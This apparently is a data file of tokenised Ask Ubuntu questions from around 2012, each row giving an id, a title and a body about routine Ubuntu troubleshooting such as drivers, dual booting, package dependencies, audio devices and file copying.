217707	how can i make ubuntuone work on windows 7 64bit under a proxy ?	i read all the answer but fisrt i could n't find the package suggested to download and after that i understood that ubuntuone 3.02 has the proxy support . the fact is that in my office we have an automatic setting of the proxy using a script ... .and a sso to access to our domain , internet , intranet ... . do i have any hope to use it ? thanx in advance
217709	is it possible to import a keyring to another from its binary files	i have recently set up a computer ( using precise ) , and want to import data i have saved from another ubuntu ( maverick ) . these data include a gnome keyring , which i ( rather stupidly ) copied the encrypted files instead of exporting . what i did > cp -r ~/.gnome2/keyring /backup/gnome2_keyring given that i still know the session passwords i used for the corresponding user account on old maverick computer , what can i do to recover/import passwords ? as this is a home user question , and has to be done only once , i am not concerned with security problems : i 'll wipe my free space afterwards and that will be enough .
217710	install faenza icon theme in libreoffice 3.6	i have installed ubuntu 12.10 and i am using the faenza icon pack.in other versions , i could use those icons in the libreoffice toolbar , but not in this one ( version 3.6 ) .the 3.5 version did n't worked.can anyone teach me how to install faenza in lo 3.6 ?
217711	how do i rebuild and test nautilus source ?	i 'm new to os level programming so apologies for the noobness . ultimately i would like to change the behaviour of clicking on `` change desktop background '' from the desktop context menu . it would appear the nautilus package contains the source and i have even found the line which calls the desktop control panel after clicking on `` change desktop background '' . is it possible to re-compile the modified version of nautilus , test it , and install it on my own system ? this could be ultra noob asking a question like this but i just do n't know yet !
217712	why does ubuntu ( and other ubuntu based distros like lubuntu and linux mint ) randomly shutdown on my laptop ?	i have a lenovo g555 laptop and whenever i try and boot a ubuntu based distro off a usb , it randomly shuts off my pc ( not like a normal shutdown with shutdown loading screen but a like a sudden hard power off ) . this problem occurs even if i have installed the distro on my harddrive . in the past i 've been able to use the distro for 10 min or so before it would it would do this . now with the latest distros , it randomly pwers off even before it has fully booted up . my hardware specs are on this website .
217714	12.10 starts up to just my desktop background	i have only just started using linux more than just instlling it on an old pc for fun and have just changed the driver settings from the default option . the computer starts up and goes through everything else well , but at slightly lower resolution . once signing on to ubuntu , it only displays my desktop background and cursor . can i restore it to the default driver settings ? i 've spent a while transferring files and do n't want to reinstall ubuntu .
217715	i used sudo halt and now ca n't access my server to restart !	bit of a noob here ( clearly ) . i was having some issues with my server so i tried to restart it , i used sudo halt and now ca n't access my server to restart ! i did n't forsee this problem , it 's a dedicated server but obviously i do n't have physical access . how do i start it again ?
217717	epson printer expression homexp-305	i have tried many things with this new printer . it installs in the add printer box . when i ask it to print a test page the response is idle - sending data to printer and the job listing number just increases . i am running ubuntu 12.10 . so far nothing has printed . i 've been to the epson download center and there is nothing suitable .
217722	how to use a specific dns on wifi connection ?	i read a few articles which stated that my isp ( bsnl ) has weak dns servers and using a different faster dns like opendns or google will increase the speed . i use a wifi connection through the router . now i want to assign the google dns to my connection as google is giving me the least ping time . how do i do this ? a step by step guide if possible please ! i am geting just 30kb/s right now , i am using 12.10 if needed as info .
217723	how do i get virtualbox to work ?	i ca n't seem to make virtualbox to work , i 've installed it and reinstalled by 3 ways : terminal , ubuntu software center and virtualbox 's official web site installation and i keep getting the same kernel error . i found a `` solution '' to this problem by typing in terminal : sudo apt-get install virtualbox-dkms but it tells my that `` virtualbox-dkms is already the newest version '' . then i typed in terminal what the error tells me : sudo /etc/init.d/vboxdrv setup but then i tells me that dkms is actually not installed ( which is a contradiction ) . if anyone has encountered the same problem and actually solved it please tell me and explain me step by step 'cause i 'm new to linux .
217724	error during 10.04 lts to 12.04.1 lts : `` failed to fetch ... ''	i am trying to upgrade through the `` update manager . '' after clicking upgrade the `` distribution upgrade '' dialog appears and begins , `` preparing to upgrade '' at which point i get a message : third party sources disabled some third party entries in your sources.list were disabled . you can re-enable them after the upgrade with the 'software-properties ' tool or your package manager . i click close and the `` distribution upgrade '' moves on to `` setting new software channels . '' at that point i get : error during update a problem occurred during the update . this is usually some sort of network problem , please check your network connection and retry . w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/karmic-backports/main/source/sources 404 not found [ ip : 91.189.91.13 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/karmic-backports/restricted/source/sources 404 not found [ ip : 91.189.91.13 80 ] w : failed to fetch h t t p : //us.archive.ubuntu.com/ubuntu/dists/karmic-backports/universe/source/sources 404 not found [ ip : 91.189.91.13 80 ] w : failed to fetch h t t p : //us.archive.ubuntu.com/ubuntu/dists/karmic-backports/multiverse/source/sources 404 not found [ ip : 91.189.91.13 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . the upgrade then fails . any help appreciated .
217730	place for password is blocked	i am running ubuntu 12-10 . this is my trouble : when i write ( for example ) sudo apt-get install wine in terminal all seems ok until the program asks for password . the problem is that the place to write is blocked by a white rectangle so writing is impossible ! please help , perolof
217737	how to install amd proprietary drivers from ppa on ubuntu studio 12.04 ?	i have just switched to ubuntu studio 12.04 from ubuntu 12.10 and i was wondering how to install my proprietary amd drivers from a ppa like on ubuntu . another question is if the way we install programs in xubuntu is the same as installing on ubuntu studio or ubuntu . thanks
217739	weird graphics in software center	i just installed ubuntu 12.10 , and everything is running great , except in the software center . i have a nvidia geforce gt 430 , and whenever i go into the software center insted of seeing words there 's just a black box . it will sometimes load correctly but everything will start flashing . anyone know how to fix this ?
217742	list files of particular extension	ok this is strange . i am using this code , ls *.prj to list all the files with the .prj extension in the dir but i am getting this error , bash : /bin/ls : argument list too long i eventually wish to get the count of files and i was using , ls *.prj | wc -l but even this command is giving the same error . any idea where i am going wrong ?
217750	attempted to use ubuntu to resize partitions , lost windows 7	i will attempt to keep this as comprehensive as possible . long story - short of how this all came to be : windows 7 partition ran out of room ( insanely made this 120gb , far too small for my needs ) , i deleted ubuntu 10.04 and reinstalled windows 7 . i now have two windows 7 running side by side with the option to boot either at start-up . i did this with the intention of being lazy moving files . all went well until it came time to remove the original windows 7 install . using a usb iso of 12.04 i removed the 120 gb windows 7 install . i ran out of time to complete the resize ( and figured for safety sake i should do only one operation at a time ) , so at this point i restarted . no boot ... crap . thought installing ubuntu might cause grub to give me dual boot options , nope . at this point , i have read forum after forum and after trying countless various fixes such as boot repair in ubuntu , repairing from the windows 7 cd , banging my head on the keyboard , i am at wits end . also i do n't know if this helps but here it is http : //paste.ubuntu.com/1361152/ . with an error in the terminal : ( glade2script:11316 ) : gtk-warning ** : attempting to set the permissions of `/root/.local/share/recently-used.xbel ' , but failed : no such file or directory ocal/share/recently-used.xbel.miyunw ' : no such file or directory so , now i pray that one of you wonderfully genius people can assist me .
217751	how can i install ubuntu in dual-boot with windows on a asus s200e with uefi ?	i 've installed ubuntu on an asus s200e , but after the installation i 'm no longer able to run either ubuntu or windows 8 . this is the boot-repair log i 've got , here you can find all the info : http : //paste2.org/p/2483158 after using boot-repair , this is the new bootinfo summary : http : //paste.ubuntu.com/1361562/ now , i can boot the system , but i ca n't login ( `` invalid password '' error ) . maybe boot-repair deleted some system files ? solved : thank you , the problem was that ubuntu was n't correctly installed . the installation procedure did n't create the user ! i 've reinstalled ubuntu , re-did the boot-repair procedure , and now everything works .
217752	reset /etc/resolv.conf after vpn	i managed to get juniper network vpn working on my 12.10 64-bit ubuntu . but now i see that after disconnecting the vpn , the settings in /etc/resolv.conf are still set to those of my employer , not my personal isp . so i can ping internet sites by ip , but not by hostname . is there an automated way that i can reset those to my isp 's values ? actually , i am not even sure what those settings were . do i need to re-add dhcp or something like that ? thanks for any advice .
217755	ubuntu 12.10 and android bluetooth pairing problem	i 'm trying to pair my android device ( galaxy wonder android version 2.3.6 ) to my acer aspire 4741g running ubuntu 12.10 via bluetooth . both my phone and the laptop discover one another , but when i start pairing with my phone it generates a pairing request with a passkey but no dialog that asks me to enter the pass key appears on the laptop so pairing fails , when i start pairing via the laptop by adding a new device , it discovers my phone but no pairing request appears on my phone so pairing fails too . any help ?
217756	w520 external monitor setup with ubuntu 12.10	i just installed a fresh ubuntu 12.10 64-bit desktop on my lenovo w520 . it looks like there are a lot of challenges around making it work with out of the box nouveau drivers or propriety nvidia drivers or intel gpu . i looked at couple of notes on how to make it work with bumblebee with optimus nvidia . none of them seems to work for 12.10 . anybody has a solid answer on this ? it seems like a lot of people are suffering from this . here is my xrandr output . let me know if you need any additional information . screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 8192 x 8192 lvds1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 344mm x 193mm 1920x1080 60.0*+ 59.9 50.0 1680x1050 60.0 59.9 1600x1024 60.2 1400x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) thanks , sef
217757	how can i programmatically change a file 's icon ?	if i select an icon in nautilus and select properties , i can click on the icon presented there . this gives me a file-chooser dialog to select a new icon image . i would like to do this via a script of some sort so that i can assign the same icon to many files at once . or take a list of icons and a list of files and assign them to each other . is there some way i can accomplish this ? something in bash or python would be great , but i 'll take what i can get . please note : i am not asking how to change the icon for a file type . i am not asking how to change an icon on the launcher .
217758	how to make an xorg.conf file	i just installed ubuntu 12.10 and i need to make a custom xorg.conf file . by default , there is not an xorg.conf file on my system . i know what i need to write in the config , but i just do n't know how to make x load it ... should i put my custom commands in a file that already exists ? where is it ? should i make my own xorg.conf file and put it in /etc/x11 ?
217760	does the windows installer partition your hard-drive ?	and if it does n't , how does it deal with memory , etc . ?
217761	speed up ntfs transfer rate ?	i 'm not sure if this is a limitation of ubuntu , or if there is some setting i do n't have enabled . when i copy files to my ntfs usb stick , i get around 1.5mb/s . if i format it to fat i get 30mb/s . if i mount the ntfs formated stick on a windows virtualbox running inside ubuntu i also got 30mb/s . it 's a 64gb usb3.0 stick that i want to use with windows and ubuntu computers , and i want file sizes over 4gb . am i stuck using windows in virtual box to transfer files ? thanks
217764	argument list too long when copying files	i just asked a question related to how i can count the files of particular extension . now i want to cp these files to a new dir . i am trying , cp *.prj ../prjshp/ and cp * | grep '\.prj $ ' ../prjshp/ but they are giving the same error , bash : /bin/cp : argument list too long how do i copy them ?
217770	java2-runtime virtual package not considered installed by dpkg/apt-get	did a fresh install of quetzal server , installed all updates . installed default-jre-headless which pulled in openjdk 7 jre without any x11-related packages . so far so good . now i try to install http : //nectar-downloads.cloudbees.com/jenkins-enterprise/1.466/debian/binary/jenkins_1.466.2.1_all.deb ( via apt-get after adding a software source and apt-get update ) whose header according to apt-cache show jenkins says depends : daemon , adduser , psmisc , java2-runtime but this proposes to install openjdk 6âwith gui ! $ apt-get -s install jenkins the following new packages will be installed : fontconfig hicolor-icon-theme icedtea-6-jre-cacao icedtea-6-jre-jamvm icedtea-netx icedtea-netx-common jenkins libasound2 libasyncns0 libatk-wrapper-java libatk-wrapper-java-jni libatk1.0-0 libatk1.0-data libcairo2 libdatrie1 libflac8 libgdk-pixbuf2.0-0 libgdk-pixbuf2.0-common libgif4 libgtk2.0-0 libgtk2.0-bin libgtk2.0-common libjasper1 libjbig0 libjson0 libogg0 libpango1.0-0 libpixman-1-0 libpulse0 libsndfile1 libthai-data libthai0 libtiff5 libvorbis0a libvorbisenc2 libxcb-render0 libxcb-shm0 libxcomposite1 libxcursor1 libxdamage1 libxfixes3 libxft2 libxi6 libxinerama1 libxml2 libxrandr2 libxrender1 libxtst6 openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib sgml-base shared-mime-info ttf-dejavu-extra x11-common xml-core why is apt-get not happy with the java 7 runtime i already installed and which provides this virtual package ? $ grep-available -f provides -s package java2-runtime package : openjdk-7-jre-headless package : default-jre-headless even if i manually install the one missing dependency , daemon , there appears to be no way to force apt-get install jenkins to not try to pull in new java dependencies . i also tried downloading the *.deb and using dpkg -i to install it manually . but this also fails : dpkg : dependency problems prevent configuration of jenkins : jenkins depends on java2-runtime ; however : package java2-runtime is not installed . ( note : i am deliberately not here testing the jenkins package in universe , which has a different dependency listâśwhich seems to behave even worse . )
217774	troubles saving tar.gz	when trying to package .tar.gz files from folders ( backup ) using this script tar -zcvf desktop.tar.gz /home/user/desktop/ it 's suppose to be saved as 'desktop.tar.gz ' and its a copy of '/home/user/desktop/ ' , but inside the .tar.gz the file structure is /home/user/desktop/ instead of just desktop/ . any ideas on how to make it save as just desktop/ ?
217775	command to view the time lapsed	i am executing a lot of commands of transferring data in ubuntu using command line and these are really big file ( both in numbers and size ) . so when i execute the cp command , i know the copy is taking place but i am not sure how much has been completed ? is there some command or an option that i can add to the cp command , which will give me the idea how much file transfer has taken place ?
217776	copying one user to another computer	i would like to make a shell script that enables me to literally copy one user account on one ubuntu box to another machine running ubuntu . the idea is to be able to log into that user account on the new machine just like i did on the old one . any ideas ? howto 's ? other things i need to look out for that might make the system blow up ? thanks : )
217779	verify tar backup on an lto5	is there a terminal command to verify a tar backup on an lto5 tape . once i back up all my files i want to be able to view file size and or number of items to verify backup was complete . i do not know if it can be done . any help would be appreciated .
217784	how to tell to use the windows recovery partition to install ?	my disk partitions are like this : on /dev/sda /dev/sda1 ntfs recovery 13.1 gib /dev/sda2 ntfs win8 142 gib /dev/sda3 ntfs data 143 gib the recovery partition is for vista so i 'd like to install ubuntu on that . in simple mode , the installer only offer to use /dev/sda2 . in advanced mode , it shows the 3 partitions , is it enough to select sda1 and click 'install now ' ?
217786	scroll with middle click	can i use the middle click mouse button so i can scroll down faster like windows ? i mean when i am in windows and i press the middle click somewhere i can scroll in a 4 way pointer shows on the screen and when i move the mouse in any direction the window will scroll in that direction even without continuing to press the middle button . is there anything like this in ubuntu ? how can i do this especially in chrome !
217789	can i just download the ubuntu iso file to my usb and run it straight away with no installers ?	i do n't have access to running any installer at the minute so i knew that if running from the cd you just burn the iso file to the cd and your ready to go..but can i download this iso file to my usb and run it straight away when i change my bios to boot from usb ? ..or do i have to use the installer ? ..i ca n't use the installer for different reasons and i 'm not really looking to install ubuntu just yet i just want to run it off my usb to try it out..so is it possible not to use the installer to put it on my usb ? ( i downloaded ubuntu 12.10 )
217792	drivers not listed under `` additional drivers ''	i have an asus k55v laptop with an nvidia geforce gt 630m graphics adapter . i want to install nvidia 's latest proprietary drivers , but the list under the `` additional drivers '' tab in `` software sources '' is empty . what might be the cause of this ?
217794	problem with arcam rpac and ubuntu 12.04	i have recently ( mistakenly ? ) purchased an arcam rpac usb dac for my ubuntu ( 12.04 ) pc . i have torn out all but 3 of my hairs trying to get this to work and have had absolutely no luck so far . i can see the arcam usb audio device when i run aplay -l , however i can not see it listed under the sound settings . i can see the soundcard device when running alsamixer also , but if i try and select it , alsamixer crashes , stating `` can not load mixer controls : invalid argument '' . any ideas how to get this working ( if it 's even possible ) ? does anyone else out there have the rpac with ubuntu ?
217797	running dist-upgrade broke my install	so i ran apt-get update ; apt-get dist-upgrade the upgrade failed and i lost the gui , i have an encrypted /home drive . when i run apt-get * ( any command ) i have all kinds of errors mostly missing depends and thats because apparently my network stack is gone . i have no nic if i run ifconfig . it does n't even show up with lspci if i were to do a `` clean '' install of 10.04 lts which is what i had on my on my build , will i lose all my data ? btw i was just using ubuntu 's default encryption to manage the encryption using my pswd as the key so if i were to use the same user name and pswd would my data be accessible ? i can see my data from command line , when or if xorg does start it just loads a basic window with nothing but a black x in the middle of the screen which i can only assume is my mouse cursor but it does n't move ! reddit /r/linux had some ideas none of which worked was , no help . and apparently /r/ubuntu is full of jerks because all they did was ridicule me . if i can get my install back i probably will be switching back to either slackware or gentoo . the ubuntu forums were of no help they had the same suggestion as /r/linux . i am about to just run my back up script to my back up drives and nuke everything else but i 'd rather not .
217801	how do i run firefox os as a standalone application ?	i got the add-on for the firefox os simulator , and it works great ! it even keeps functioning after firefox is closed , so i can save processing power for other things . i 'd like to run it as a standalone application , so that i do n't even have to open firefox in the first place . i 've gone to the system monitor , and it says that the process ( i guessed which by cpu usage and filename ) was started via /home/james/.mozilla/firefox-trunk/vkuuxfit.default/extensions/r2d2b2g @ mozilla.org/resources/r2d2b2g/data/linux64/b2g/plugin-container 3386 true tab , so i tried running that in the terminal ( after i 'd closed the simulator , of course , ) but it gives this : james @ james-optiplex-gx620 : ~/.mozilla/firefox-trunk/vkuuxfit.default/extensions/r2d2b2g @ mozilla.org/resources/r2d2b2g/data/linux64/b2g $ ./plugin-container 3386 true tab ./plugin-container : error while loading shared libraries : libxpcom.so : can not open shared object file : no such file or directory james @ james-optiplex-gx620 : ~/.mozilla/firefox-trunk/vkuuxfit.default/extensions/r2d2b2g @ mozilla.org/resources/r2d2b2g/data/linux64/b2g $ what should i do ? is what i 'm attempting even possible ? ( it should be , since the simulator kept running even after firefox itself was closed ... ) note : i 've tried chmod u+sx plugin-container , but that did n't help .
217802	strange gtk3 issue with audacious and evince ( document viewer )	i find that , in some gtk3 apps such as audacious and evince ( document viewer ) , parts of the ui are pure black , which looks ugly and out-of-place . it is not intentional , as the screenshots on both websites show the app looking different . i only have this issue with the adwaita gtk theme , but since it comes with gnome 3 and is the main theme these apps are designed for , i 'm guessing the problem is not simply the theme having some bug ( though the ubuntu package might ) . i have had this issue on two laptops now , running both ubuntu 12.04 and xubunu 12.10 with gnome shell and adwaita . the screenshots below show the problem : audcious 's is visible in the search area around the text box , and behind the playlist tabs , and evince 's is visible in more or less the same position and around the document itself . compare this from the audacious homepage : with this image from my system : and evince too :
217804	youtube no longer works in chrom v23.0 after kernel update today ( 3.2.0-33 )	using ubuntu 12.04 , chrome browser v23.0 , and had an ubuntu update today 11-15-2012 , and now suddenly i can no longer open you tube videos full screen . it works well up until today . some part of the update must have altered something on the system . i had to reboot today since the kernel was affected during the update . hope this helps .
217808	an error in .profile file prevents the system from booting ?	i tryied to set the java_home environmet variable in the ~/.profile file and i made a mistake java_home= '' /usr/lib/jvm/jdk1.6.0_37 '' path= $ java_home : path the error is in the path referencing . i put path rather than $ path . this prevents me from login . i tried to edit the file using the recovery mode but it says that the file system is read only . so any suggestions how to deal with this issue . thanks
217809	update has caused my system to start in text mode	tonight my system informed me of an update , having preformed the update i was asked to restart the system . now on start up i 'm now presented with the linux console , asking for my user name and password . how do i get back my graphical interface back , when the update left conflicting versions of nvidia graphics drivers in place . i get the error error api mismatch nvidia kernel is ver 304.48 but the driver component is 295.40 when attempting to start x from the console .
217810	ubuntu 12.10 in virtualbox 4.2.4 screen resolution limited to 1600x1200	i have installed ubuntu 12.10 ( x64 ) in virtualbox 4.2.4 on windows 7 , and installed guest additions with no problems reported . i set the display memory to 128mb . after rebooting , the display settings only show 4x3 aspect ratio with a max of 1600x1200 . my screen is 1920x1200 . i created a ubuntu 11 installation in virtualbox using the included .iso and after installation of guestadditions it works fine .
217814	i would like to install windows 7 on ubuntu 12.04 on a mac 8.1 hard drive	i am trying to install windows 7 on ubuntu 12.4 . can you walk me through this process . my ubuntu is installed on a mac 8.1 .
217818	gcc compiler errors with `` no such file or directory ''	my ubuntu version is 12.04 lts . i have written some c programs . but there is a compiler-problem . i 've googled and found that i need build-essential . so i download and installed it . after installation , it worked well . but after maybe 3 hours , the problem happened again . when i write : gcc -o -std=c99 sort sort.c the compiler complains : gcc : error : sort : no such file or directory . i have no idea now .
217825	ubuntu refuses to switch to usb audio device [ creative x-fi hd usb ]	i am currently running a persistent live session of ubuntu 12.04.1 lts , installed on a 4gb flash drive . i own a creative labs x-fi hd usb audio device , which i desire to use with my installation . previously on windows , i was able to simply plug the usb cable from the device into my laptop ( hp dv6 ) and it would automatically switch to the device . however , when i plug the device in under ubuntu , it shows up in sound settings as an audio output and also as an audio input the problem is , i can not select the item to make it the output device , even though i can click on it ( i also pressed `` enter '' while it is highlighted ) . if i 'm not doing something incredibly stupid , i think it 's a driver problem . within alsamixer , it appears as an output and input device . the only part of x-fi that works is the volume knob ; turning the volume knob on the device changes the volume in ubuntu . also , when headphones are used with the device , moving the in-line volume control of the headphones produces a crackling sound . however : when running audacity , i am perfectly able to select the x-fi as the output device , and it plays through the x-fi flawlessly . why does ubuntu refuse to play system audio through the x-fi , or allow me to select it as the output device ? is this a mere software bug ? faulty hardware ? missing proprietary drivers ? any and all help will be greatly appreciated : )
217829	streaming pulseaudio output using rygel	i am trying to stream the output from pulseaudio to my wdtvlive streaming media player using rygel . i have been playing around with it for a while , looking around forums/blogs etc and i’m getting closer but i ca n't quite get it running ( i 've been using ubuntu for a few years but still a relative novice ) . currently i am getting the following errors when i run rygel in a terminal : rygel-tracker-message : rygel-tracker-plugin-factory.vala:33 : plugin 'tracker ' disabled by user , ignoring . mediathek-message : rygel-mediathek-plugin.vala:33 : plugin 'zdfmediathek ' disabled by user , ignoring.. mpris-message : rygel-mpris-plugin-factory.vala:33 : module 'mpris ' disabled by user , igoring… external-message : rygel-external-plugin-factory.vala:33 : module 'external ' disabled by user , igoring… mediaexport-message : rygel-media-export-plugin.vala:32 : plugin 'mediaexport ' disabled by user , ignoring.. rygel-message : new plugin 'gstlaunch ' available ( rygel:6727 ) : rygel-critical ** : error from pipeline rygelhttpgstresponse : pulsesrc.c ( 1480 ) : gst_pulsesrc_prepare ( ) : /gstpipeline : rygelhttpgstresponse/gstbin : bin0/gstpulsesrc : pulsesrc0 ( rygel:6727 ) : rygel-critical ** : error from pipeline rygelhttpgstresponse : pulsesrc.c ( 1480 ) : gst_pulsesrc_prepare ( ) : /gstpipeline : rygelhttpgstresponse/gstbin : bin1/gstpulsesrc : pulsesrc1 ( rygel:6727 ) : rygel-warning ** : rygel-http-request.vala:97 : invalid seek request ( rygel:6727 ) : rygel-warning ** : rygel-http-request.vala:97 : invalid seek request ( rygel:6727 ) : rygel-warning ** : rygel-http-request.vala:97 : invalid seek request the final error seems to repeat indefinitely . i can see the stream on both my wdlive player , and also using bubbleupnp on my phone , however i can not hear any audio on the device and my wdtv seems to think the format is not supported ( i checked and encoding to flac as i am doing is apparently supported . i have also tried other formats with the same result . currently on ubuntu 12.10 and rygel 16.0.2 hope someone can help . thanks .
217830	how can i install dpkg-dev without installing gcc 4.6 ?	i have manually installed gcc/g++ 4.7 on my ubuntu 12.04 when i run sudo apt-get install dpkg-dev it 's trying to download and install g++ 4.6 which would obviously break 4.7 . how can i install dpkg-dev without installing gcc 4.6 ?
217835	how do i disable the right side of my trackpad ?	i 'm trying to figure out how to disable the right hand side of my trackpad in ubuntu . the default behavoir is for the right hand side to right click . however , i would like a single click anywhere on the pad to act as a single click , while having a two finger press behave as a right click . i also have a sony vaio t-series svt13122cxs and am running 12.10 . thanks for any help .
217837	quiet sound on 12.10 , thinkpad t530	everything in alsamixer is maxed . what other things can i try ? my audio device is : 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 )
217841	how do i install python2.7 in order to play music in rhythmbox ?	when i try to play music in rhythmbox , it 's asking me to install python 2.7 . may i know the links and process to download and install it ? also please let me know the other softwares to update . when i try to type sudo apt-get install ubuntu-restricted-extras in the terminal , it 's throwing an error : could n't find any extras . can any one please resolve this issue ?
217845	moving steam ( installed w/ wine ) to another hdd without reinstalling games	is there any way to move steam and all of my steam games to another hard drive without having to re-installing everything ? i would prefer to keep wine on the original drive , if possible . i 'm running ubuntu 12.04 and the most recent stable release of wine .
217846	how to clean uninstall ubuntu 12 from free dos laptop	hi i bought a laptop with free dos and have tried ubuntu 12 on it for few weeks . have had lots of problem with it and many applications . i really ca n't make it to work and need this machine for my business fast ! no offend to ubuntu community , i just need this computer to work then will consider install it on dual boot mode . please help .
217847	how to install ubuntu server over ubuntu desktop on my mac ?	i currently am running ubuntu desktop 12.04 on my macbook . i have a cd of ubuntu server 12.04 and want to wipe my mac and install ubuntu server but have not been able to find any information about how to do this on a mac already running ubuntu .
217849	apt-mirror - changing source mirror creates new folder for downloads	i have a local ubuntu mirror running on ubuntu 10.04 in my office which uses archive.ubuntu.com to download updates and releases . i have been running this mirror since ubuntu 's hardy heron release . it downloads everything under /export/ubuntu-repo1/apt-mirror/mirror/archive.ubuntu.com/ folder . recently i came to know that the mirror in india i.e . in.archive.ubuntu.com is a lot faster for me than http : //archive.ubuntu.com which is based in uk . therefore to download latest release quantal quetzal i configured indian mirror in /etc/apt/mirror.list after making this change and leaving apt-mirror to run overnight i found that it downloaded everything to a new folder called `` in.archive.ubuntu.com '' so now i have two folders where apt-mirror downloads updates . /export/ubuntu-repo1/apt-mirror/mirror/archive.ubuntu.com/ /export/ubuntu-repo1/apt-mirror/mirror/in.archive.ubuntu.com/ now , since apache does not have `` in.archive.ubuntu.com '' configured , ubuntu clients are unable to access quantal quetzal release and its updates . my question is : is there a way i could copy everything downloaded under `` in.archive.ubuntu.com '' to `` archive.ubuntu.com '' so all new updates of the latest release become accessible to ubuntu clients ? secondly , can i configure apt-mirror to download everything to archive.ubuntu.com even using indian mirror ? thanks a lot for your help in advance . i kazi
217856	what is the gnome command for the battery applet ?	it used to be gnome-power-manager or something of that sort , but now i ca n't seem to find it . when i run gnome-session from within awesome , it loads all the applets , i.e . nm-applet and the keyboard layout switcher , yet it does n't load the battery applet , and so i 'd like to launch it with a command .
217859	matlab installation is stuck -- how do i abort it ?	it does not advance . there is no `` cancel '' button . is there a way to escape the installation process , perhaps via a terminal command or something else ?
217861	blank red screen after login	after login into ubuntu 12.10 , i see only a red blank screen .
217862	strange artifacts in 3d programs on mac	i recently upgraded from 10.04 to 12.04 on my macbook 7,1 . now , in any 3d program , strange rectangular artifacts cover some of the screen ; they seem to be dependent on displayed objects . this is , of course , having the effect of *gasp in horror* rendering my games unplayable . before i asphyxiate due to lack of 3d games , or choke on a rectangle , how can i fix this ? i am running metacity on gnome-fallback on 12.04 . $ sudo lshw -c video *-display description : vga compatible controller product : nvidia corporation vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi vga_controller bus_master cap_list rom configuration : driver=nouveau latency=0 resources : irq:16 memory:92000000-92ffffff memory:80000000-8fffffff memory:90000000-91ffffff ioport:1000 ( size=128 ) memory:93000000-9301ffff video card : nvidia corporation device 08a0 ( rev a2 ) nothing appears under additional drivers , and i would prefer to avoid proprietary software . wings 3d : neverputt :
217867	just installed ubuntu 12.10 and gnuplot wxt terminal does n't work	i 've just installed the latest version of ubuntu ( 12.10 ) . i then installed gnuplot with this command : sudo apt-get install gnuplot however , now whenever i run gnuplot it says terminal set to 'unknown' on my old installation of ubuntu ( 12.04 ) it worked and would set the terminal to 'wxt ' . any idea why it does n't set it to the correct terminal ? also , set terminal wxt does n't work either . thanks
217869	can i emulate a cd-rom through a usb cable to another computer ?	so i was wondering if anyone out there knew a way to do something like the following 1 . mount iso/dvd on host 2. share through a usb connection : making the client think the usb connection is a native cd-rom drive . i know this can be done through a network ( not that i know how to do that ) but i will ask that question separately , as to not confuse google searches .
217870	what is the easiest way to host a cd-rom drive or iso through a network ( for booting/install )	so this is something ive wanted to learn ( network booting ) but it seems everytime i look it up , there is something unnecessarily complex or its just obscure , so i figure id post it here and try to find something a little more intelligible for others that might search ... as well as learn myself . so can anyone point me to a cross-platform method of booting through a network ?
217871	can not open /dev/ttys0 : permission denied , but in dialout group	i am trying to use my 9 pin serial port to connect my automotive ecu to my computer ( megasquirt controller ) . i 've done this before with ubuntu 10.04 but now that i 've just upgraded to 12.04 it simply will not connect . i did n't have any issue before . now i simply can not open this port . using chmod i get this : ~ $ chmod o+rw /dev/ttys0 chmod : changing permissions of `/dev/ttys0 ' : operation not permitted
217872	how do i remove steam ?	anyone know of a way to remove steam from ubuntu 12.04 ? looked around the net but could not find an straight forward solution . thanks .
217876	open new windows with kupfer	i was using gnome-do before i switched to kupfer which is awesome , the problem is that when i try to open something like terminal and i already have one open it will switch focus to the existing one . is there any way to set it up that it will open a new window instead ?
217877	trouble booting ubuntu 12.10 after upgrade	at first , i got this message : `` the disk drive for / is not ready yet or not present '' i typed 'm ' to run manual recovery in shell . next , i tried chroot / mount -n -o remount , defaults /dev/sda1 / apt-get install -f i got this off a post , but i have no clue what it means ( i 'm a total rookie at shell ) ! after the last command runs , it fails to correct dependencies and ends with these two lines : e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies what is going on ?
217878	anyone getting bad printouts from 12.10 ?	for several years i have been downloading credit card statements as pdf files . i then print them , before inputting the info to gnucash . i just installed ubuntu 12.10 yesterday . now if i try to print one of these files , in most instances a quantity prefaced by a $ -sign is messed up . what happens , is the $ -sign overwrites the first digit of the number . i tried to report this as a bug , but it seems to be nearly impossible to report a bug if the application has not crashed . has anyone else noticed this bug ? if so , do you know if it has been reported ?
217881	how do i enable my wireless connection ?	i ca n't enable my wireless connection after i upgraded my ubuntu 10.04 lts into ubuntu 11.10. my wifi works just fine on ubuntu 10.04 . i have an atheros ar9285 wireless network adapter from atheros communications inc .
217882	no gui after upgraded to ubuntu 10.04	i 've upgraded to ubuntu 10.04 , after reboot it is displaying command prompt , gui is not displaying sudo update-grub sudo apt-get install build-essential sudo apt-get install ubuntu-desktop
217886	what is the correct way to install gnome shell 3.6 on ubuntu 12.10 ?	i do n't want to use ubuntu gnome remix because i think it is kind of `` incomplete '' . i prefer to install gnome shell on ubuntu 12.10 . i 've searched the net for instructions on how to do it and found two different ways : simply search for gnome shell on ubuntu software center and install it . follow the instructions from this webupd8 's post . now , my doubt is : what is the differecen between the two methods ? which is the correct way to do it ? does the first one lack features ? if so , which ones ? is the second one better ? why ? is there a third and better method i have n't found ? by the way , i have already tried ( for testing purposes ) the second method ( webupd8 's ) and noticed that it installed some apps i really do n't want to have , such as abiword and gnumeric , because they are gnome 's default applications . so , `` if '' the second method is the way to go , i can certainly remove those apps manually , after installation , with no worries , right ? thank you very much for your attention .
217887	`` folder contents could not be displayed . '' error when trying to plug in a galaxy nexus	tried to connect galaxy nexus to ubuntu 12.10 64bit , i choose open folder from a pop up dialog box and it says the following error : the folder contents could not be displayed . sorry , could not display all the contents of `` galaxy nexus '' . timeout was reached anyone have the same issue ?
